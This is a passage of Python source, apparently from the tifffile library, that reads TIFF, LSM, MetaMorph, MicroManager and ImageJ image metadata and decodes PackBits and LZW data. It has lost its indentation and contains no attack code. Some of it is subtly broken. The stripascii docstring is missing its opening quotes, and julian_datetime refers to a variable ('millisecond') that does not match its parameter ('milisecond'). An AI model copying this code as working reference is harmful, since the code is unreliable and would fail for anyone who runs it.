for tag in sorted(self.values(), key=lambda x: x.code):
typecode = "%i%s" % (tag.count * int(tag.dtype[0]), tag.dtype[1])
line = "* %i %s (%s) %s" % (
tag.code, tag.name, typecode, tag.as_str())
s.append(line[:PRINT_LINE_LEN].lstrip())
return '\n'.join(s)
class FileHandle(object):
"""Binary file handle.
* Handle embedded files (for CZI within CZI files).
* Allow re-opening closed files (for multi-file formats such as OME-TIFF).
* Read numpy arrays and records from file-like objects.
Only binary read, seek, tell, and close are supported on embedded files.
When initialized from another file handle, do not use that handle again
until this FileHandle is closed.
Attributes
----------
name : str
Name of the file.
path : str
Absolute path to file.
size : int
Size of file in bytes.
is_file : bool
If True, file has a fileno and can be memory mapped.
All attributes are read-only.
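Examples
--------
A hedged usage sketch (assuming a file 'test.tif' exists):
>>> with FileHandle('test.tif') as fh:  # doctest: +SKIP
...     header = fh.read(8)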
"""
__slots__ = ('_fh', '_arg', '_mode', '_name', '_dir',
'_offset', '_size', '_close', 'is_file')
def __init__(self, arg, mode='rb', name=None, offset=None, size=None):
"""Initialize file handle from file name or another file handle.
Parameters
----------
arg : str, File, or FileHandle
File name or open file handle.
mode : str
File open mode in case 'arg' is a file name.
name : str
Optional name of file in case 'arg' is a file handle.
offset : int
Optional start position of embedded file. By default this is
the current file position.
size : int
Optional size of embedded file. By default this is the number
of bytes from the 'offset' to the end of the file.
"""
self._fh = None
self._arg = arg
self._mode = mode
self._name = name
self._dir = ''
self._offset = offset
self._size = size
self._close = True
self.is_file = False
self.open()
def open(self):
"""Open or re-open file."""
if self._fh:
return # file is open
if isinstance(self._arg, basestring):
# file name
self._arg = os.path.abspath(self._arg)
self._dir, self._name = os.path.split(self._arg)
self._fh = open(self._arg, self._mode)
self._close = True
if self._offset is None:
self._offset = 0
elif isinstance(self._arg, FileHandle):
# FileHandle
self._fh = self._arg._fh
if self._offset is None:
self._offset = 0
self._offset += self._arg._offset
self._close = False
if not self._name:
if self._offset:
name, ext = os.path.splitext(self._arg._name)
self._name = "%s@%i%s" % (name, self._offset, ext)
else:
self._name = self._arg._name
self._dir = self._arg._dir
else:
# open file object
self._fh = self._arg
if self._offset is None:
self._offset = self._arg.tell()
self._close = False
if not self._name:
try:
self._dir, self._name = os.path.split(self._fh.name)
except AttributeError:
self._name = "Unnamed stream"
if self._offset:
self._fh.seek(self._offset)
if self._size is None:
pos = self._fh.tell()
self._fh.seek(self._offset, 2)
self._size = self._fh.tell()
self._fh.seek(pos)
try:
self._fh.fileno()
self.is_file = True
except Exception:
self.is_file = False
def read(self, size=-1):
"""Read 'size' bytes from file, or until EOF is reached."""
if size < 0 and self._offset:
size = self._size
return self._fh.read(size)
def memmap_array(self, dtype, shape, offset=0, mode='r', order='C'):
"""Return numpy.memmap of data stored in file."""
if not self.is_file:
raise ValueError("Can not memory map file without fileno.")
return numpy.memmap(self._fh, dtype=dtype, mode=mode,
offset=self._offset + offset,
shape=shape, order=order)
def read_array(self, dtype, count=-1, sep=""):
"""Return numpy array from file.
Work around numpy issue #2230, "numpy.fromfile does not accept
StringIO object" https://github.com/numpy/numpy/issues/2230.
"""
try:
return numpy.fromfile(self._fh, dtype, count, sep)
except IOError:
if count < 0:
size = self._size
else:
size = count * numpy.dtype(dtype).itemsize
data = self._fh.read(size)
return numpy.fromstring(data, dtype, count, sep)
def read_record(self, dtype, shape=1, byteorder=None):
"""Return numpy record from file."""
try:
rec = numpy.rec.fromfile(self._fh, dtype, shape,
byteorder=byteorder)
except Exception:
dtype = numpy.dtype(dtype)
if shape is None:
shape = self._size // dtype.itemsize
size = product(sequence(shape)) * dtype.itemsize
data = self._fh.read(size)
return numpy.rec.fromstring(data, dtype, shape,
byteorder=byteorder)
return rec[0] if shape == 1 else rec
def tell(self):
"""Return file's current position."""
return self._fh.tell() - self._offset
def seek(self, offset, whence=0):
"""Set file's current position."""
if self._offset:
if whence == 0:
self._fh.seek(self._offset + offset, whence)
return
elif whence == 2:
self._fh.seek(self._offset + self._size + offset, 0)
return
self._fh.seek(offset, whence)
def close(self):
"""Close file."""
if self._close and self._fh:
self._fh.close()
self._fh = None
self.is_file = False
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
def __getattr__(self, name):
"""Return attribute from underlying file object."""
if self._offset:
warnings.warn(
"FileHandle: '%s' not implemented for embedded files" % name)
return getattr(self._fh, name)
@property
def name(self):
return self._name
@property
def dirname(self):
return self._dir
@property
def path(self):
return os.path.join(self._dir, self._name)
@property
def size(self):
return self._size
@property
def closed(self):
return self._fh is None
def read_bytes(fh, byteorder, dtype, count):
"""Read tag data from file and return as byte string."""
dtype = 'b' if dtype[-1] == 's' else byteorder+dtype[-1]
return fh.read_array(dtype, count).tostring()
def read_numpy(fh, byteorder, dtype, count):
"""Read tag data from file and return as numpy array."""
dtype = 'b' if dtype[-1] == 's' else byteorder+dtype[-1]
return fh.read_array(dtype, count)
def read_json(fh, byteorder, dtype, count):
"""Read JSON tag data from file and return as object."""
data = fh.read(count)
try:
return json.loads(unicode(stripnull(data), 'utf-8'))
except ValueError:
warnings.warn("invalid JSON `%s`" % data)
def read_mm_header(fh, byteorder, dtype, count):
"""Read MM_HEADER tag from file and return as numpy.rec.array."""
return fh.read_record(MM_HEADER, byteorder=byteorder)
def read_mm_stamp(fh, byteorder, dtype, count):
"""Read MM_STAMP tag from file and return as numpy.array."""
return fh.read_array(byteorder+'f8', 8)
def read_uic1tag(fh, byteorder, dtype, count, plane_count=None):
"""Read MetaMorph STK UIC1Tag from file and return as dictionary.
Return empty dictionary if plane_count is unknown.
"""
assert dtype in ('2I', '1I') and byteorder == '<'
result = {}
if dtype == '2I':
# pre MetaMorph 2.5 (not tested)
values = fh.read_array('<u4', 2*count).reshape(count, 2)
result = {'z_distance': values[:, 0] / values[:, 1]}
elif plane_count:
for i in range(count):
tagid = struct.unpack('<I', fh.read(4))[0]
if tagid in (28, 29, 37, 40, 41):
# silently skip unexpected tags
fh.read(4)
continue
name, value = read_uic_tag(fh, tagid, plane_count, offset=True)
result[name] = value
return result
def read_uic2tag(fh, byteorder, dtype, plane_count):
"""Read MetaMorph STK UIC2Tag from file and return as dictionary."""
assert dtype == '2I' and byteorder == '<'
values = fh.read_array('<u4', 6*plane_count).reshape(plane_count, 6)
return {
'z_distance': values[:, 0] / values[:, 1],
'date_created': values[:, 2], # julian days
'time_created': values[:, 3], # milliseconds
'date_modified': values[:, 4], # julian days
'time_modified': values[:, 5], # milliseconds
}
def read_uic3tag(fh, byteorder, dtype, plane_count):
"""Read MetaMorph STK UIC3Tag from file and return as dictionary."""
assert dtype == '2I' and byteorder == '<'
values = fh.read_array('<u4', 2*plane_count).reshape(plane_count, 2)
return {'wavelengths': values[:, 0] / values[:, 1]}
def read_uic4tag(fh, byteorder, dtype, plane_count):
"""Read MetaMorph STK UIC4Tag from file and return as dictionary."""
assert dtype == '1I' and byteorder == '<'
result = {}
while True:
tagid = struct.unpack('<H', fh.read(2))[0]
if tagid == 0:
break
name, value = read_uic_tag(fh, tagid, plane_count, offset=False)
result[name] = value
return result
def read_uic_tag(fh, tagid, plane_count, offset):
"""Read a single UIC tag value from file and return tag name and value.
UIC1Tags use an offset.
"""
def read_int(count=1):
value = struct.unpack('<%iI' % count, fh.read(4*count))
return value[0] if count == 1 else value
try:
name, dtype = UIC_TAGS[tagid]
except KeyError:
# unknown tag
return '_tagid_%i' % tagid, read_int()
if offset:
pos = fh.tell()
if dtype not in (int, None):
off = read_int()
if off < 8:
warnings.warn("invalid offset for uic tag '%s': %i"
% (name, off))
return name, off
fh.seek(off)
if dtype is None:
# skip
name = '_' + name
value = read_int()
elif dtype is int:
# int
value = read_int()
elif dtype is Fraction:
# fraction
value = read_int(2)
value = value[0] / value[1]
elif dtype is julian_datetime:
# datetime
value = julian_datetime(*read_int(2))
elif dtype is read_uic_image_property:
# ImagePropertyEx
value = read_uic_image_property(fh)
elif dtype is str:
# pascal string
size = read_int()
if 0 <= size < 2**10:
value = struct.unpack('%is' % size, fh.read(size))[0][:-1]
value = stripnull(value)
elif offset:
value = ''
warnings.warn("corrupt string in uic tag '%s'" % name)
else:
raise ValueError("invalid string size %i" % size)
elif dtype == '%ip':
# sequence of pascal strings
value = []
for i in range(plane_count):
size = read_int()
if 0 <= size < 2**10:
string = struct.unpack('%is' % size, fh.read(size))[0][:-1]
string = stripnull(string)
value.append(string)
elif offset:
warnings.warn("corrupt string in uic tag '%s'" % name)
else:
raise ValueError("invalid string size %i" % size)
else:
# struct or numpy type
dtype = '<' + dtype
if '%i' in dtype:
dtype = dtype % plane_count
if '(' in dtype:
# numpy type
value = fh.read_array(dtype, 1)[0]
if value.shape[-1] == 2:
# assume fractions
value = value[..., 0] / value[..., 1]
else:
# struct format
value = struct.unpack(dtype, fh.read(struct.calcsize(dtype)))
if len(value) == 1:
value = value[0]
if offset:
fh.seek(pos + 4)
return name, value
def read_uic_image_property(fh):
"""Read UIC ImagePropertyEx tag from file and return as dict."""
# TODO: test this
size = struct.unpack('B', fh.read(1))[0]
name = struct.unpack('%is' % size, fh.read(size))[0][:-1]
flags, prop = struct.unpack('<IB', fh.read(5))
if prop == 1:
value = struct.unpack('II', fh.read(8))
value = value[0] / value[1]
else:
size = struct.unpack('B', fh.read(1))[0]
value = struct.unpack('%is' % size, fh.read(size))[0]
return dict(name=name, flags=flags, value=value)
def read_cz_lsm_info(fh, byteorder, dtype, count):
"""Read CS_LSM_INFO tag from file and return as numpy.rec.array."""
assert byteorder == '<'
magic_number, structure_size = struct.unpack('<II', fh.read(8))
if magic_number not in (50350412, 67127628):
raise ValueError("not a valid CS_LSM_INFO structure")
fh.seek(-8, 1)
if structure_size < numpy.dtype(CZ_LSM_INFO).itemsize:
# adjust structure according to structure_size
cz_lsm_info = []
size = 0
for name, dtype in CZ_LSM_INFO:
size += numpy.dtype(dtype).itemsize
if size > structure_size:
break
cz_lsm_info.append((name, dtype))
else:
cz_lsm_info = CZ_LSM_INFO
return fh.read_record(cz_lsm_info, byteorder=byteorder)
def read_cz_lsm_floatpairs(fh):
"""Read LSM sequence of float pairs from file and return as list."""
size = struct.unpack('<i', fh.read(4))[0]
return fh.read_array('<2f8', count=size)
def read_cz_lsm_positions(fh):
"""Read LSM positions from file and return as list."""
size = struct.unpack('<I', fh.read(4))[0]
return fh.read_array('<2f8', count=size)
def read_cz_lsm_time_stamps(fh):
"""Read LSM time stamps from file and return as list."""
size, count = struct.unpack('<ii', fh.read(8))
if size != (8 + 8 * count):
raise ValueError("lsm_time_stamps block is too short")
# return struct.unpack('<%dd' % count, fh.read(8*count))
return fh.read_array('<f8', count=count)
def read_cz_lsm_event_list(fh):
"""Read LSM events from file and return as list of (time, type, text)."""
count = struct.unpack('<II', fh.read(8))[1]
events = []
while count > 0:
esize, etime, etype = struct.unpack('<IdI', fh.read(16))
etext = stripnull(fh.read(esize - 16))
events.append((etime, etype, etext))
count -= 1
return events
def read_cz_lsm_scan_info(fh):
"""Read LSM scan information from file and return as Record."""
block = Record()
blocks = [block]
unpack = struct.unpack
if 0x10000000 != struct.unpack('<I', fh.read(4))[0]:
# not a Recording sub block
raise ValueError("not a lsm_scan_info structure")
fh.read(8)
while True:
entry, dtype, size = unpack('<III', fh.read(12))
if dtype == 2:
# ascii
value = stripnull(fh.read(size))
elif dtype == 4:
# long
value = unpack('<i', fh.read(4))[0]
elif dtype == 5:
# rational
value = unpack('<d', fh.read(8))[0]
else:
value = 0
if entry in CZ_LSM_SCAN_INFO_ARRAYS:
blocks.append(block)
name = CZ_LSM_SCAN_INFO_ARRAYS[entry]
newobj = []
setattr(block, name, newobj)
block = newobj
elif entry in CZ_LSM_SCAN_INFO_STRUCTS:
blocks.append(block)
newobj = Record()
block.append(newobj)
block = newobj
elif entry in CZ_LSM_SCAN_INFO_ATTRIBUTES:
name = CZ_LSM_SCAN_INFO_ATTRIBUTES[entry]
setattr(block, name, value)
elif entry == 0xffffffff:
# end sub block
block = blocks.pop()
else:
# unknown entry
setattr(block, "entry_0x%x" % entry, value)
if not blocks:
break
return block
def read_nih_image_header(fh, byteorder, dtype, count):
"""Read NIH_IMAGE_HEADER tag from file and return as numpy.rec.array."""
a = fh.read_record(NIH_IMAGE_HEADER, byteorder=byteorder)
a = a.newbyteorder(byteorder)
a.xunit = a.xunit[:a._xunit_len]
a.um = a.um[:a._um_len]
return a
def read_micromanager_metadata(fh):
"""Read MicroManager non-TIFF settings from open file and return as dict.
The settings can be used to read image data without parsing the TIFF file.
Raise ValueError if file does not contain valid MicroManager metadata.
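A hedged usage sketch (assuming a MicroManager TIFF file 'mm.ome.tif'):
>>> with FileHandle('mm.ome.tif') as fh:  # doctest: +SKIP
...     settings = read_micromanager_metadata(fh)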
"""
fh.seek(0)
try:
byteorder = {b'II': '<', b'MM': '>'}[fh.read(2)]
except KeyError:
raise ValueError("not a MicroManager TIFF file")
results = {}
fh.seek(8)
(index_header, index_offset, display_header, display_offset,
comments_header, comments_offset, summary_header, summary_length
) = struct.unpack(byteorder + "IIIIIIII", fh.read(32))
if summary_header != 2355492:
raise ValueError("invalid MicroManager summary_header")
results['summary'] = read_json(fh, byteorder, None, summary_length)
if index_header != 54773648:
raise ValueError("invalid MicroManager index_header")
fh.seek(index_offset)
header, count = struct.unpack(byteorder + "II", fh.read(8))
if header != 3453623:
raise ValueError("invalid MicroManager index_header")
data = struct.unpack(byteorder + "IIIII"*count, fh.read(20*count))
results['index_map'] = {
'channel': data[::5], 'slice': data[1::5], 'frame': data[2::5],
'position': data[3::5], 'offset': data[4::5]}
if display_header != 483765892:
raise ValueError("invalid MicroManager display_header")
fh.seek(display_offset)
header, count = struct.unpack(byteorder + "II", fh.read(8))
if header != 347834724:
raise ValueError("invalid MicroManager display_header")
results['display_settings'] = read_json(fh, byteorder, None, count)
if comments_header != 99384722:
raise ValueError("invalid MicroManager comments_header")
fh.seek(comments_offset)
header, count = struct.unpack(byteorder + "II", fh.read(8))
if header != 84720485:
raise ValueError("invalid MicroManager comments_header")
results['comments'] = read_json(fh, byteorder, None, count)
return results
def imagej_metadata(data, bytecounts, byteorder):
"""Return dict from ImageJ metadata tag value."""
_str = str if sys.version_info[0] < 3 else lambda x: str(x, 'cp1252')
def read_string(data, byteorder):
return _str(stripnull(data[0 if byteorder == '<' else 1::2]))
def read_double(data, byteorder):
return struct.unpack(byteorder+('d' * (len(data) // 8)), data)
def read_bytes(data, byteorder):
#return struct.unpack('b' * len(data), data)
return numpy.fromstring(data, 'uint8')
metadata_types = { # big endian
b'info': ('info', read_string),
b'labl': ('labels', read_string),
b'rang': ('ranges', read_double),
b'luts': ('luts', read_bytes),
b'roi ': ('roi', read_bytes),
b'over': ('overlays', read_bytes)}
metadata_types.update( # little endian
dict((k[::-1], v) for k, v in metadata_types.items()))
if not bytecounts:
raise ValueError("no ImageJ metadata")
if data[:4] not in (b'IJIJ', b'JIJI'):
raise ValueError("invalid ImageJ metadata")
header_size = bytecounts[0]
if header_size < 12 or header_size > 804:
raise ValueError("invalid ImageJ metadata header size")
ntypes = (header_size - 4) // 8
header = struct.unpack(byteorder+'4sI'*ntypes, data[4:4+ntypes*8])
pos = 4 + ntypes * 8
counter = 0
result = {}
for mtype, count in zip(header[::2], header[1::2]):
values = []
name, func = metadata_types.get(mtype, (_str(mtype), read_bytes))
for _ in range(count):
counter += 1
pos1 = pos + bytecounts[counter]
values.append(func(data[pos:pos1], byteorder))
pos = pos1
result[name.strip()] = values[0] if count == 1 else values
return result
def imagej_description(description):
"""Return dict from ImageJ image_description tag."""
def _bool(val):
return {b'true': True, b'false': False}[val.lower()]
_str = str if sys.version_info[0] < 3 else lambda x: str(x, 'cp1252')
result = {}
for line in description.splitlines():
try:
key, val = line.split(b'=')
except Exception:
continue
key = key.strip()
val = val.strip()
for dtype in (int, float, _bool, _str):
try:
val = dtype(val)
break
except Exception:
pass
result[_str(key)] = val
return result
def _replace_by(module_function, package=None, warn=False):
"""Try replace decorated function by module.function.
This is used to replace local functions with functions from another
(usually compiled) module, if available.
Parameters
----------
module_function : str
Module and function path string (e.g. numpy.ones)
package : str, optional
The parent package of the module
warn : bool, optional
Whether to warn when wrapping fails
Returns
-------
func : function
Wrapped function, hopefully calling a function in another module.
Example
-------
>>> @_replace_by('_tifffile.decodepackbits')
... def decodepackbits(encoded):
... raise NotImplementedError
"""
def decorate(func, module_function=module_function, warn=warn):
try:
modname, function = module_function.split('.')
if package is None:
full_name = modname
else:
full_name = package + '.' + modname
module = __import__(full_name, fromlist=[modname])
func, oldfunc = getattr(module, function), func
globals()['__old_' + func.__name__] = oldfunc
except Exception:
if warn:
warnings.warn("failed to import %s" % module_function)
return func
return decorate
def decodejpg(encoded, tables=b'', photometric=None,
ycbcr_subsampling=None, ycbcr_positioning=None):
"""Decode JPEG encoded byte string (using _czifile extension module)."""
import _czifile
image = _czifile.decodejpg(encoded, tables)
if photometric == 'rgb' and ycbcr_subsampling and ycbcr_positioning:
# TODO: convert YCbCr to RGB
pass
return image.tostring()
@_replace_by('_tifffile.decodepackbits')
def decodepackbits(encoded):
"""Decompress PackBits encoded byte string.
PackBits is a simple byte-oriented run-length compression scheme.
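Example for the pure-Python fallback (may be replaced by a C extension):
>>> decodepackbits(b'\\x02abc')  # doctest: +SKIP
b'abc'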
"""
func = ord if sys.version[0] == '2' else lambda x: x
result = []
result_extend = result.extend
i = 0
try:
while True:
n = func(encoded[i]) + 1
i += 1
if n < 129:
result_extend(encoded[i:i+n])
i += n
elif n > 129:
result_extend(encoded[i:i+1] * (258-n))
i += 1
except IndexError:
pass
return b''.join(result) if sys.version[0] == '2' else bytes(result)
@_replace_by('_tifffile.decodelzw')
def decodelzw(encoded):
"""Decompress LZW (Lempel-Ziv-Welch) encoded TIFF strip (byte string).
The strip must begin with a CLEAR code and end with an EOI code.
This is an implementation of the LZW decoding algorithm described in (1).
It is not compatible with old style LZW compressed files like quad-lzw.tif.
"""
len_encoded = len(encoded)
bitcount_max = len_encoded * 8
unpack = struct.unpack
if sys.version[0] == '2':
newtable = [chr(i) for i in range(256)]
else:
newtable = [bytes([i]) for i in range(256)]
newtable.extend((0, 0))
def next_code():
"""Return integer of `bitw` bits at `bitcount` position in encoded."""
start = bitcount // 8
s = encoded[start:start+4]
try:
code = unpack('>I', s)[0]
except Exception:
code = unpack('>I', s + b'\x00'*(4-len(s)))[0]
code <<= bitcount % 8
code &= mask
return code >> shr
switchbitch = { # code: bit-width, shr-bits, bit-mask
255: (9, 23, int(9*'1'+'0'*23, 2)),
511: (10, 22, int(10*'1'+'0'*22, 2)),
1023: (11, 21, int(11*'1'+'0'*21, 2)),
2047: (12, 20, int(12*'1'+'0'*20, 2)), }
bitw, shr, mask = switchbitch[255]
bitcount = 0
if len_encoded < 4:
raise ValueError("strip must be at least 4 characters long")
if next_code() != 256:
raise ValueError("strip must begin with CLEAR code")
code = 0
oldcode = 0
result = []
result_append = result.append
while True:
code = next_code() # ~5% faster when inlining this function
bitcount += bitw
if code == 257 or bitcount >= bitcount_max: # EOI
break
if code == 256: # CLEAR
table = newtable[:]
table_append = table.append
lentable = 258
bitw, shr, mask = switchbitch[255]
code = next_code()
bitcount += bitw
if code == 257: # EOI
break
result_append(table[code])
else:
if code < lentable:
decoded = table[code]
newcode = table[oldcode] + decoded[:1]
else:
newcode = table[oldcode]
newcode += newcode[:1]
decoded = newcode
result_append(decoded)
table_append(newcode)
lentable += 1
oldcode = code
if lentable in switchbitch:
bitw, shr, mask = switchbitch[lentable]
if code != 257:
warnings.warn("unexpected end of lzw stream (code %i)" % code)
return b''.join(result)
@_replace_by('_tifffile.unpackints')
def unpackints(data, dtype, itemsize, runlen=0):
"""Decompress byte string to array of integers of any bit size <= 32.
Parameters
----------
data : byte str
Data to decompress.
dtype : numpy.dtype or str
A numpy boolean or integer type.
itemsize : int
Number of bits per integer.
runlen : int
Number of consecutive integers, after which to start at next byte.
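Examples
--------
A sketch unpacking two 4-bit values from one byte (pure-Python path):
>>> unpackints(b'\\xf0', 'uint8', 4, runlen=2)  # doctest: +SKIP
array([15,  0], dtype=uint8)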
"""
if itemsize == 1: # bitarray
data = numpy.fromstring(data, '|B')
data = numpy.unpackbits(data)
if runlen % 8:
data = data.reshape(-1, runlen + (8 - runlen % 8))
data = data[:, :runlen].reshape(-1)
return data.astype(dtype)
dtype = numpy.dtype(dtype)
if itemsize in (8, 16, 32, 64):
return numpy.fromstring(data, dtype)
if itemsize < 1 or itemsize > 32:
raise ValueError("itemsize out of range: %i" % itemsize)
if dtype.kind not in "biu":
raise ValueError("invalid dtype")
itembytes = next(i for i in (1, 2, 4, 8) if 8 * i >= itemsize)
if itembytes != dtype.itemsize:
raise ValueError("dtype.itemsize too small")
if runlen == 0:
runlen = len(data) // itembytes
skipbits = runlen*itemsize % 8
if skipbits:
skipbits = 8 - skipbits
shrbits = itembytes*8 - itemsize
bitmask = int(itemsize*'1'+'0'*shrbits, 2)
dtypestr = '>' + dtype.char # dtype always big endian?
unpack = struct.unpack
l = runlen * (len(data)*8 // (runlen*itemsize + skipbits))
result = numpy.empty((l, ), dtype)
bitcount = 0
for i in range(len(result)):
start = bitcount // 8
s = data[start:start+itembytes]
try:
code = unpack(dtypestr, s)[0]
except Exception:
code = unpack(dtypestr, s + b'\x00'*(itembytes-len(s)))[0]
code <<= bitcount % 8
code &= bitmask
result[i] = code >> shrbits
bitcount += itemsize
if (i+1) % runlen == 0:
bitcount += skipbits
return result
def unpackrgb(data, dtype='<B', bitspersample=(5, 6, 5), rescale=True):
"""Return array from byte string containing packed samples.
Use to unpack RGB565 or RGB555 to RGB888 format.
Parameters
----------
data : byte str
The data to be decoded. Samples in each pixel are stored consecutively.
Pixels are aligned to 8, 16, or 32 bit boundaries.
dtype : numpy.dtype
The sample data type. The byteorder applies also to the data stream.
bitspersample : tuple
Number of bits for each sample in a pixel.
rescale : bool
Upscale samples to the number of bits in dtype.
Returns
-------
result : ndarray
Flattened array of unpacked samples of native dtype.
Examples
--------
>>> data = struct.pack('BBBB', 0x21, 0x08, 0xff, 0xff)
>>> print(unpackrgb(data, '<B', (5, 6, 5), False))
[ 1 1 1 31 63 31]
>>> print(unpackrgb(data, '<B', (5, 6, 5)))
[ 8 4 8 255 255 255]
>>> print(unpackrgb(data, '<B', (5, 5, 5)))
[ 16 8 8 255 255 255]
"""
dtype = numpy.dtype(dtype)
bits = int(numpy.sum(bitspersample))
if not (bits <= 32 and all(i <= dtype.itemsize*8 for i in bitspersample)):
raise ValueError("sample size not supported %s" % str(bitspersample))
dt = next(i for i in 'BHI' if numpy.dtype(i).itemsize*8 >= bits)
data = numpy.fromstring(data, dtype.byteorder+dt)
result = numpy.empty((data.size, len(bitspersample)), dtype.char)
for i, bps in enumerate(bitspersample):
t = data >> int(numpy.sum(bitspersample[i+1:]))
t &= int('0b'+'1'*bps, 2)
if rescale:
o = ((dtype.itemsize * 8) // bps + 1) * bps
if o > data.dtype.itemsize * 8:
t = t.astype('I')
t *= (2**o - 1) // (2**bps - 1)
t //= 2**(o - (dtype.itemsize * 8))
result[:, i] = t
return result.reshape(-1)
def reorient(image, orientation):
"""Return reoriented view of image array.
Parameters
----------
image : numpy array
Non-squeezed output of asarray() functions.
Axes -3 and -2 must be image length and width respectively.
orientation : int or str
One of TIFF_ORIENTATIONS keys or values.
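Examples
--------
A hedged sketch flipping the image length axis:
>>> img = numpy.arange(6).reshape(1, 2, 3, 1)  # doctest: +SKIP
>>> reorient(img, 'bottom_left')[0, :, 0, 0]  # doctest: +SKIP
array([3, 0])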
"""
o = TIFF_ORIENTATIONS.get(orientation, orientation)
if o == 'top_left':
return image
elif o == 'top_right':
return image[..., ::-1, :]
elif o == 'bottom_left':
return image[..., ::-1, :, :]
elif o == 'bottom_right':
return image[..., ::-1, ::-1, :]
elif o == 'left_top':
return numpy.swapaxes(image, -3, -2)
elif o == 'right_top':
return numpy.swapaxes(image, -3, -2)[..., ::-1, :]
elif o == 'left_bottom':
return numpy.swapaxes(image, -3, -2)[..., ::-1, :, :]
elif o == 'right_bottom':
return numpy.swapaxes(image, -3, -2)[..., ::-1, ::-1, :]
def squeeze_axes(shape, axes, skip='XY'):
"""Return shape and axes with single-dimensional entries removed.
Remove unused dimensions unless their axes are listed in 'skip'.
>>> squeeze_axes((5, 1, 2, 1, 1), 'TZYXC')
((5, 2, 1), 'TYX')
"""
if len(shape) != len(axes):
raise ValueError("dimensions of axes and shape don't match")
shape, axes = zip(*(i for i in zip(shape, axes)
if i[0] > 1 or i[1] in skip))
return shape, ''.join(axes)
def transpose_axes(data, axes, asaxes='CTZYX'):
"""Return data with its axes permuted to match specified axes.
A view is returned if possible.
>>> transpose_axes(numpy.zeros((2, 3, 4, 5)), 'TYXC', asaxes='CTZYX').shape
(5, 2, 1, 3, 4)
"""
for ax in axes:
if ax not in asaxes:
raise ValueError("unknown axis %s" % ax)
# add missing axes to data
shape = data.shape
for ax in reversed(asaxes):
if ax not in axes:
axes = ax + axes
shape = (1,) + shape
data = data.reshape(shape)
# transpose axes
data = data.transpose([axes.index(ax) for ax in asaxes])
return data
def stack_pages(pages, memmap=False, *args, **kwargs):
"""Read data from sequence of TiffPage and stack them vertically.
If memmap is True, return an array stored in a binary file on disk.
Additional parameters are passed to the page asarray function.
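A hedged usage sketch (assuming a file 'multipage.tif' exists):
>>> with TiffFile('multipage.tif') as tif:  # doctest: +SKIP
...     data = stack_pages(tif.pages)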
"""
if len(pages) == 0:
raise ValueError("no pages")
if len(pages) == 1:
return pages[0].asarray(memmap=memmap, *args, **kwargs)
result = pages[0].asarray(*args, **kwargs)
shape = (len(pages),) + result.shape
if memmap:
with tempfile.NamedTemporaryFile() as fh:
result = numpy.memmap(fh, dtype=result.dtype, shape=shape)
else:
result = numpy.empty(shape, dtype=result.dtype)
for i, page in enumerate(pages):
result[i] = page.asarray(*args, **kwargs)
return result
def stripnull(string):
"""Return string truncated at first null character.
Clean NULL terminated C strings.
>>> stripnull(b'string\\x00') # doctest: +SKIP
b'string'
"""
i = string.find(b'\x00')
return string if (i < 0) else string[:i]
def stripascii(string):
Return string truncated at last byte that is 7-bit ASCII.
Clean NULL separated and terminated TIFF strings.
>>> stripascii(b'string\\x00string\\n\\x01\\x00') # doctest: +SKIP
b'string\\x00string\\n'
>>> stripascii(b'\\x00') # doctest: +SKIP
b''
"""
# TODO: pythonize this
ord_ = ord if sys.version_info[0] < 3 else lambda x: x
i = len(string)
while i:
i -= 1
if 8 < ord_(string[i]) < 127:
break
else:
i = -1
return string[:i+1]
def format_size(size):
"""Return file size as string from byte size."""
for unit in ('B', 'KB', 'MB', 'GB', 'TB'):
if size < 2048:
return "%.f %s" % (size, unit)
size /= 1024.0
def sequence(value):
"""Return tuple containing value if value is not a sequence.
>>> sequence(1)
(1,)
>>> sequence([1])
[1]
"""
try:
len(value)
return value
except TypeError:
return (value, )
def product(iterable):
"""Return product of sequence of numbers.
Equivalent of functools.reduce(operator.mul, iterable, 1).
>>> product([2**8, 2**30])
274877906944
>>> product([])
1
"""
prod = 1
for i in iterable:
prod *= i
return prod
def natural_sorted(iterable):
"""Return human sorted list of strings.
E.g. for sorting file names.
>>> natural_sorted(['f1', 'f2', 'f10'])
['f1', 'f2', 'f10']
"""
def sortkey(x):
return [(int(c) if c.isdigit() else c) for c in re.split(numbers, x)]
numbers = re.compile(r'(\d+)')
return sorted(iterable, key=sortkey)
def excel_datetime(timestamp, epoch=datetime.datetime.fromordinal(693594)):
"""Return datetime object from timestamp in Excel serial format.
Convert LSM time stamps.
>>> excel_datetime(40237.029999999795)
datetime.datetime(2010, 2, 28, 0, 43, 11, 999982)
"""
return epoch + datetime.timedelta(timestamp)
def julian_datetime(julianday, milisecond=0):
"""Return datetime from days since 1/1/4713 BC and ms since midnight.
Convert Julian dates according to MetaMorph.
>>> julian_datetime(2451576, 54362783)
datetime.datetime(2000, 2, 2, 15, 6, 2, 783)
"""
if julianday <= 1721423:
# no datetime before year 1
return None
a = julianday + 1
if a > 2299160:
alpha = math.trunc((a - 1867216.25) / 36524.25)
a += 1 + alpha - alpha // 4
b = a + (1524 if a > 1721423 else 1158)
c = math.trunc((b - 122.1) / 365.25)
d = math.trunc(365.25 * c)
e = math.trunc((b - d) / 30.6001)
day = b - d - math.trunc(30.6001 * e)
month = e - (1 if e < 13.5 else 13)
year = c - (4716 if month > 2.5 else 4715)
    hour, millisecond = divmod(millisecond, 1000 * 60 * 60)
    minute, millisecond = divmod(millisecond, 1000 * 60)
    second, millisecond = divmod(millisecond, 1000)
    return datetime.datetime(year, month, day,
                             hour, minute, second, millisecond)
def test_tifffile(directory='testimages', verbose=True):
"""Read all images in directory.
Print error message on failure.
>>> test_tifffile(verbose=False)
"""
successful = 0
failed = 0
start = time.time()
for f in glob.glob(os.path.join(directory, '*.*')):
if verbose:
print("\n%s>\n" % f.lower(), end='')
t0 = time.time()
try:
tif = TiffFile(f, multifile=True)
except Exception as e:
if not verbose:
print(f, end=' ')
print("ERROR:", e)
failed += 1
continue
try:
img = tif.asarray()
except ValueError:
try:
img = tif[0].asarray()
except Exception as e:
if not verbose:
print(f, end=' ')
print("ERROR:", e)
failed += 1
continue
finally:
tif.close()
successful += 1
if verbose:
print("%s, %s %s, %s, %.0f ms" % (
str(tif), str(img.shape), img.dtype, tif[0].compression,
(time.time()-t0) * 1e3))
if verbose:
print("\nSuccessfully read %i of %i files in %.3f s\n" % (
successful, successful+failed, time.time()-start))
class TIFF_SUBFILE_TYPES(object):
def __getitem__(self, key):
result = []
if key & 1:
result.append('reduced_image')
if key & 2:
result.append('page')
if key & 4:
result.append('mask')
return tuple(result)
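# Example: TIFF_SUBFILE_TYPES()[5] -> ('reduced_image', 'mask')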
TIFF_PHOTOMETRICS = {
0: 'miniswhite',
